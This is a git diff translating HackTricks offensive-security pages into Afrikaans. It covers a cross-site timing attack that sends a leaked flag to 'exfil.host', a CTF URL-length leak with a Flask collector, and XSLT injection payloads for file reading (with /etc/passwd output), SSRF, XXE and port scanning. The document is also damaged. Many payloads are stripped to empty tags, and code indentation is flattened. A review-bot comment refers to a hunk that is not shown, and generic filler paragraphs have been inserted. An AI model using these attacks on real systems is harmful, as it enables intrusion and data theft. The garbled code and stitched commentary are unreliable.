-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
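Review bot: the heading `+# performance.now + Kragtige taak afdwing` mistranslates "Force heavy task": `kragtige` means powerful, while the page is about forcing work that is heavy enough to move the load time (the hint below explicitly says the default `object` size is too small to make a difference), so "swaar taak" is the right word. In the next paragraph `as die vlag bevat was` is not idiomatic; `as die vlag daarin voorkom` keeps the meaning. The hunk also removes the blank line between `{% endhint %}` and the opening fence and, in `@@ -27,105 +26,102 @@`, strips the indentation of the exploit body (`+if (notFound > found) {`, `+while(true) {`, `+for(let char of charset) {`); code whitespace should be left untouched by the translation.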
diff --git a/pentesting-web/xs-search/performance.now-example.md b/pentesting-web/xs-search/performance.now-example.md index dd7348880..3eb067b48 100644 --- a/pentesting-web/xs-search/performance.now-example.md +++ b/pentesting-web/xs-search/performance.now-example.md @@ -1,69 +1,67 @@ -# performance.now example +# Voorbeeld van performance.now
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
-**Example taken from [https://ctf.zeyu2001.com/2022/nitectf-2022/js-api](https://ctf.zeyu2001.com/2022/nitectf-2022/js-api)** - +**Voorbeeld geneem vanaf [https://ctf.zeyu2001.com/2022/nitectf-2022/js-api](https://ctf.zeyu2001.com/2022/nitectf-2022/js-api)** ```javascript const sleep = (ms) => new Promise((res) => setTimeout(res, ms)); async function check(flag) { - let w = frame.contentWindow; - w.postMessage({'op': 'preview', 'payload': ''}, '*'); - await sleep(1); - w.postMessage({'op': 'search', 'payload': flag}, '*'); - let t1 = performance.now(); - await sleep(1); - return (performance.now() - t1) > 200; +let w = frame.contentWindow; +w.postMessage({'op': 'preview', 'payload': ''}, '*'); +await sleep(1); +w.postMessage({'op': 'search', 'payload': flag}, '*'); +let t1 = performance.now(); +await sleep(1); +return (performance.now() - t1) > 200; } async function main() { - let alpha = 'abcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZ-}'; - window.frame = document.createElement('iframe'); - frame.width = '100%'; - frame.height = '700px'; - frame.src = 'https://challenge.jsapi.tech/'; - document.body.appendChild(frame); - await sleep(1000); +let alpha = 'abcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZ-}'; +window.frame = document.createElement('iframe'); +frame.width = '100%'; +frame.height = '700px'; +frame.src = 'https://challenge.jsapi.tech/'; +document.body.appendChild(frame); +await sleep(1000); - let flag = 'nite{'; - while(1) { - for(let c of alpha) { - let result = await Promise.race([ - check(flag + c), - new Promise((res) => setTimeout(() => { res(true); }, 300)) - ]); - console.log(flag + c, result); - if(result) { - flag += c; - break; - } - } - new Image().src = '//exfil.host/log?' 
+ encodeURIComponent(flag); - } +let flag = 'nite{'; +while(1) { +for(let c of alpha) { +let result = await Promise.race([ +check(flag + c), +new Promise((res) => setTimeout(() => { res(true); }, 300)) +]); +console.log(flag + c, result); +if(result) { +flag += c; +break; +} +} +new Image().src = '//exfil.host/log?' + encodeURIComponent(flag); +} } document.addEventListener('DOMContentLoaded', main); ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/pentesting-web/xs-search/url-max-length-client-side.md b/pentesting-web/xs-search/url-max-length-client-side.md index 0b5365bd9..fc1ead0c1 100644 --- a/pentesting-web/xs-search/url-max-length-client-side.md +++ b/pentesting-web/xs-search/url-max-length-client-side.md @@ -1,57 +1,54 @@ -# URL Max Length - Client Side +# URL Maksimum Lengte - Kliëntkant
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
-Code from [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit) - +Kode vanaf [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit) ```html ``` - -Server side: - +Bedienerkant: ```python from flask import Flask, request @@ -62,34 +59,33 @@ chars = [] @app.route('/', methods=['GET']) def index(): - global chars - - nope = request.args.get('nope', '') - if nope: - chars.append(nope) +global chars - remaining = [c for c in CHARSET if c not in chars] +nope = request.args.get('nope', '') +if nope: +chars.append(nope) - print("Remaining: {}".format(remaining)) +remaining = [c for c in CHARSET if c not in chars] - return "OK" +print("Remaining: {}".format(remaining)) + +return "OK" @app.route('/exploit.html', methods=['GET']) def exploit(): - return open('exploit.html', 'r').read() +return open('exploit.html', 'r').read() if __name__ == '__main__': - app.run(host='0.0.0.0', port=1337) +app.run(host='0.0.0.0', port=1337) ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md b/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md index 8474e4480..cce971e79 100644 --- a/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md +++ b/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md @@ -1,145 +1,137 @@ -# XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations) +# XSLT-bedienerkant-inspuiting (Uitbreibare Stylbladtaal Transformasies)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## Basic Information +## Basiese Inligting -XSLT is a technology employed for transforming XML documents into different formats. It comes in three versions: 1, 2, and 3, with version 1 being the most commonly utilized. The transformation process can be executed either on the server or within the browser. +XSLT is 'n tegnologie wat gebruik word om XML-dokumente na verskillende formate te transformeer. Dit kom in drie weergawes voor: 1, 2 en 3, waarvan weergawe 1 die mees algemeen gebruik word. Die transformasieproses kan óf op die bediener óf binne die blaaier uitgevoer word. -The frameworks that are most frequently used include: +Die raamwerke wat die meeste gebruik word, sluit in: -- **Libxslt** from Gnome, -- **Xalan** from Apache, -- **Saxon** from Saxonica. +- **Libxslt** van Gnome, +- **Xalan** van Apache, +- **Saxon** van Saxonica. -For the exploitation of vulnerabilities associated with XSLT, it is necessary for xsl tags to be stored on the server side, followed by accessing that content. An illustration of such a vulnerability is documented in the following source: [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/). - -## Example - Tutorial +Vir die uitbuiting van kwesbaarhede wat verband hou met XSLT, is dit nodig dat xsl-etikette aan die bedienerkant gestoor word, gevolg deur toegang tot daardie inhoud. 'n Voorbeeld van so 'n kwesbaarheid word gedokumenteer in die volgende bron: [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/). 
+## Voorbeeld - Tutoriaal ```bash sudo apt-get install default-jdk sudo apt-get install libsaxonb-java libsaxon-java ``` - {% code title="xml.xml" %} ```xml - - CD Title - The artist - Da Company - 10000 - 1760 - + +CD Title +The artist +Da Company +10000 +1760 + ``` -{% endcode %} - {% code title="xsl.xsl" %} ```xml - - -

The Super title

- - - - - - - - - -
Titleartist
- - + + +

The Super title

+ + + + + + + + + +
Titleartist
+ +
``` {% endcode %} -Execute: - +Uitvoer: ```xml saxonb-xslt -xsl:xsl.xsl xml.xml - + Warning: at xsl:stylesheet on line 2 column 80 of xsl.xsl: - Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor +Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor - -

The Super title

- - - - - - - - - -
Titleartist
CD TitleThe artist
- + +

The Super title

+ + + + + + + + + +
Titleartist
CD TitleThe artist
+ ``` - -### Fingerprint +### Vingerafdruk {% code title="detection.xsl" %} ```xml - Version:
- Vendor:
- Vendor URL:
- - Product Name:
-
- - Product Version:
-
- - Is Schema Aware ?:
-
- - Supports Serialization:
+Vendor:
+Vendor URL:
+ +Product Name:
+
+ +Product Version:
+
+ +Is Schema Aware ?:
+
+ +Supports Serialization:
-
- - Supports Backwards Compatibility: + +Supports Backwards Compatibility:
-
+
``` {% endcode %} -And execute - +En voer uit ```xml -$saxonb-xslt -xsl:detection.xsl xml.xml +$saxonb-xslt -xsl:detection.xsl xml.xml Warning: at xsl:stylesheet on line 2 column 80 of detection.xsl: - Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor +Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor

XSLT identification

Version:2.0
Vendor:SAXON 9.1.0.8 from Saxonica
Vendor URL:http://www.saxonica.com/
``` +### Lees Plaaslike Lêer -### Read Local File - -{% code title="read.xsl" %} +{% code title="lees.xsl" %} ```xml @@ -148,12 +140,11 @@ Warning: at xsl:stylesheet on line 2 column 80 of detection.xsl: ``` {% endcode %} - ```xml $ saxonb-xslt -xsl:read.xsl xml.xml Warning: at xsl:stylesheet on line 1 column 111 of read.xsl: - Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor +Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin 
@@ -163,9 +154,17 @@ games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin ``` - ### SSRF +Server-Side Request Forgery (SSRF) is 'n aanvalstegniek wat gebruik maak van 'n kwesbare webtoepassing om 'n aanvaller toe te laat om versoek na ander interne of eksterne hulpbronne te stuur. Hierdie aanval kan gebruik word om gevoelige inligting te ontsluit, interne stelsels te skandeer of selfs om toegang tot die interne netwerk te verkry. + +SSRF-aanvalle kan plaasvind as gevolg van swak verifikasie van gebruikersinsette, onvoldoende beperkings op die toegang tot hulpbronne of die gebruik van onbetroubare protokolle soos file:// of gopher://. Die aanvaller kan die webtoepassing dwing om versoek na 'n spesifieke URL te stuur, wat kan lei tot die blootstelling van gevoelige inligting of die uitvoering van verdere aanvalle. + +Om SSRF-aanvalle te voorkom, moet ontwikkelaars gebruikersinsette behoorlik verifieer en valideringstoetse implementeer om te verseker dat slegs geldige en veilige URL's gebruik word. Daar moet ook beperkings geplaas word op die toegang tot interne hulpbronne en die gebruik van onbetroubare protokolle moet vermy word. + +As 'n pentester kan jy SSRF-aanvalle identifiseer deur die toepassing te skandeer vir moontlike kwesbaarhede, soos onvoldoende verifikasie van gebruikersinsette of die gebruik van onbetroubare protokolle. Jy kan ook probeer om toegang tot interne hulpbronne te verkry deur spesifieke URL's te stuur en te kyk of die toepassing dit aanvaar en reageer. + +Dit is belangrik om bewus te wees van die risiko's van SSRF-aanvalle en om toepassings behoorlik te beveilig om hierdie tipe aanvalle te voorkom. ```xml 
@@ -173,56 +172,71 @@ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin ``` +### Weergawes -### Versions - -There might be more or less functions depending on the XSLT version used: +Daar kan meer of minder funksies wees, afhangende van die gebruikte XSLT-weergawe: * [https://www.w3.org/TR/xslt-10/](https://www.w3.org/TR/xslt-10/) * [https://www.w3.org/TR/xslt20/](https://www.w3.org/TR/xslt20/) * [https://www.w3.org/TR/xslt-30/](https://www.w3.org/TR/xslt-30/) -## Fingerprint - -Upload this and take information +## Vingerafdruk +Laai dit op en neem inligting ```xml - Version:
- Vendor:
- Vendor URL:
- - Product Name:
-
- - Product Version:
-
- - Is Schema Aware ?:
-
- - Supports Serialization:
+Vendor:
+Vendor URL:
+ +Product Name:
+
+ +Product Version:
+
+ +Is Schema Aware ?:
+
+ +Supports Serialization:
-
- - Supports Backwards Compatibility: + +Supports Backwards Compatibility:
-
+
``` - ## SSRF +SSRF (Server-Side Request Forgery) is 'n aanvalstegniek wat gebruik word om 'n webbediener te mislei om afgelope aanvrae na ander interne hulpbronne te stuur. Dit kan gebruik word om gevoelige inligting te onttrek, interne netwerktoegang te verkry of selfs om aanvalle teen ander stelsels uit te voer. + +SSRF-aanvalle kan voorkom as 'n gevolg van swak verifikasie van gebruikersinsette, waar die aanvaller 'n URL kan insluit wat verwys na 'n interne hulpbron. Die webbediener sal dan die aanvraag na die opgegee URL stuur, sonder om te besef dat dit 'n interne hulpbron is. + +Om 'n SSRF-aanval uit te voer, moet die aanvaller 'n kwesbare webtoepassing vind wat die aanvraag na 'n URL stuur sonder behoorlike verifikasie. Die aanvaller kan dan 'n spesiaal ontwerpte URL insluit wat verwys na 'n interne hulpbron wat hy wil aanval. + +Daar is verskeie maniere waarop 'n aanvaller 'n SSRF-aanval kan uitvoer, insluitend die gebruik van protokolmanipulasie, IP-adresmanipulasie en die gebruik van interne IP-adresse of privaat netwerkadressering. + +Om 'n webtoepassing teen SSRF-aanvalle te beskerm, is dit belangrik om gebruikersinsette behoorlik te verifieer en te valideer voordat dit gebruik word om 'n aanvraag na 'n URL te stuur. Dit sluit in die beperking van toegang tot interne hulpbronne en die gebruik van 'n witlysbenadering vir toegelate URL's. ```xml ``` +## Javascript Injeksie -## Javascript Injection +Javascript-injeksie is 'n tegniek wat gebruik word deur hackers om kwaadwillige Javascript-kode in 'n webwerf in te spuit. Hierdie kode word dan uitgevoer wanneer 'n gebruiker die geïnfekteerde webwerf besoek. Die doel van hierdie aanval is gewoonlik om sensitiewe inligting te steel, gebruikers te mislei of skadelike aksies op die webwerf uit te voer. 
+Daar is verskillende metodes vir Javascript-injeksie, insluitend: + +- **Cross-site Scripting (XSS)**: Hierdie aanval maak gebruik van swakheid in die webwerf se invoervalidasie om kwaadwillige skrips in te spuit wat dan deur die webwerf aan ander gebruikers gestuur word. +- **DOM-manipulasie**: Hierdie aanval maak gebruik van die Document Object Model (DOM) van 'n webwerf om die inhoud van die webwerf te verander of skadelike aksies uit te voer. +- **Event Handlers**: Hierdie aanval maak gebruik van skadelike skrips wat aan gebeurtenishandelaars gekoppel is, soos 'n knoppie klik of 'n vorm indiening, om skadelike aksies uit te voer. +- **Javascript URI**: Hierdie aanval maak gebruik van 'n spesiale URI-skema om kwaadwillige Javascript-kode uit te voer wanneer 'n gebruiker daarop klik. + +Om jou webwerf teen Javascript-injeksie te beskerm, moet jy behoorlike invoervalidasie implementeer, gebruikersinsette korrek skoonmaak en veilige programmeerpraktyke volg. Dit sluit in die gebruik van veilige biblioteke en raamwerke, die beperking van die gebruik van eval() en die korrekte hantering van gebruikersinsette. ```xml @@ -230,11 +244,9 @@ Upload this and take information ``` - -## Directory listing (PHP) +## Gidslys (PHP) ### **Opendir + readdir** - ```xml @@ -251,23 +263,21 @@ Upload this and take information - ``` - ### **Assert (var\_dump + scandir + false)** +### **Beweer (var\_dump + scandir + vals)** ```xml - - -
- + + +
+ ``` +## Lees lêers -## Read files - -### **Internal - PHP** - +### **Intern - PHP** ```xml @@ -275,9 +285,9 @@ Upload this and take information ``` +### **Intern - XXE** -### **Internal - XXE** - +XXE (Eksterne Entiteitsinjeksie) is 'n aanvalstegniek wat gebruik word om 'n aanvaller toe te laat om eksterne entiteite in 'n XML-dokument in te sluit. Hierdie aanval kan gebruik word om gevoelige inligting te verkry, die bediener te vertraag of selfs om 'n DoS-aanval (Denial of Service) uit te voer. ```xml ]> 
@@ -287,9 +297,22 @@ Upload this and take information ``` +### **Deur middel van HTTP** -### **Through HTTP** +XSLT Server Side Injection (SSI) is 'n aanvalstegniek wat gebruik maak van die Extensible Stylesheet Language Transformations (XSLT) om kwaadwillige kode uit te voer op 'n webbediener. Hierdie aanvalstegniek maak gebruik van 'n kwesbaarheid in die verwerking van XSLT-stylesheets deur die webbediener. +Om 'n XSLT SSI-aanval uit te voer, moet jy 'n spesiaal ontwerpte XSLT-stylesheet skep wat kwaadwillige kode bevat. Hierdie stylesheet moet dan aan die webbediener gestuur word deur middel van 'n HTTP-aanvraag. Die webbediener sal die stylesheet verwerk en die kwaadwillige kode uitvoer, wat jou toelaat om die webbediener te manipuleer en toegang te verkry tot sensitiewe inligting of verdere aanvalle uit te voer. + +Dit is belangrik om te verstaan dat XSLT SSI-aanvalle slegs suksesvol sal wees as die webbediener XSLT-stylesheets verwerk en uitvoer. Nie alle webbedieners ondersteun hierdie funksionaliteit nie, dus moet jy eers vasstel of die teikensisteem vatbaar is vir hierdie tipe aanval. + +Om 'n XSLT SSI-aanval uit te voer, kan jy die volgende stappe volg: + +1. Identifiseer die teikensisteem se ondersteuning vir XSLT-verwerking deur die HTTP-responskoppe te ondersoek. Kyk vir die "Content-Type" -kop wat aandui of die webbediener XSLT-stylesheets verwerk. +2. Skep 'n kwaadwillige XSLT-stylesheet wat die gewenste aksies uitvoer, soos die oproep van 'n eksterne bron of die lees van lêers op die bediener. +3. Stuur die kwaadwillige XSLT-stylesheet na die teikensisteem deur middel van 'n HTTP-aanvraag. Maak seker dat die aanvraag die korrekte MIME-tipe vir XSLT-stylesheets bevat. +4. Monitor die webbediener se respons om te sien of die kwaadwillige kode uitgevoer word. As dit gebeur, het jy suksesvol 'n XSLT SSI-aanval uitgevoer. 
+ +Dit is belangrik om hierdie aanvalstegniek verantwoordelik te gebruik en slegs op stelsels toe te pas waarvoor jy toestemming het om te toets. Misbruik van hierdie tegniek kan lei tot ernstige regskonsekwensies. ```xml @@ -306,9 +329,7 @@ Upload this and take information &passwd; ``` - -### **Internal (PHP-function)** - +### **Intern (PHP-funksie)** ```xml @@ -321,15 +342,15 @@ Upload this and take information ```xml - - -
- + + +
+ ``` +### Poortskandering -### Port scan - +'n Poortskandering is 'n tegniek wat gebruik word om die veiligheid van 'n netwerk te ondersoek deur die poorte van 'n stelsel te ondersoek vir oop of geslote statusse. Dit behels die stuur van verskeie verbindingsversoeke na die poorte van 'n stelsel om te bepaal watter poorte aktief is en watter dienste daarop beskikbaar is. Hierdie inligting kan gebruik word om potensiële swakpunte in die netwerk te identifiseer en te verhelp. 'n Poortskandering kan uitgevoer word met behulp van verskeie sagtewarehulpmiddels, soos Nmap, om die poorte van 'n stelsel te skandeer en die resultate te analiseer. ```xml @@ -338,11 +359,9 @@ Upload this and take information ``` - -## Write to a file +## Skryf na 'n lêer ### XSLT 2.0 - ```xml 
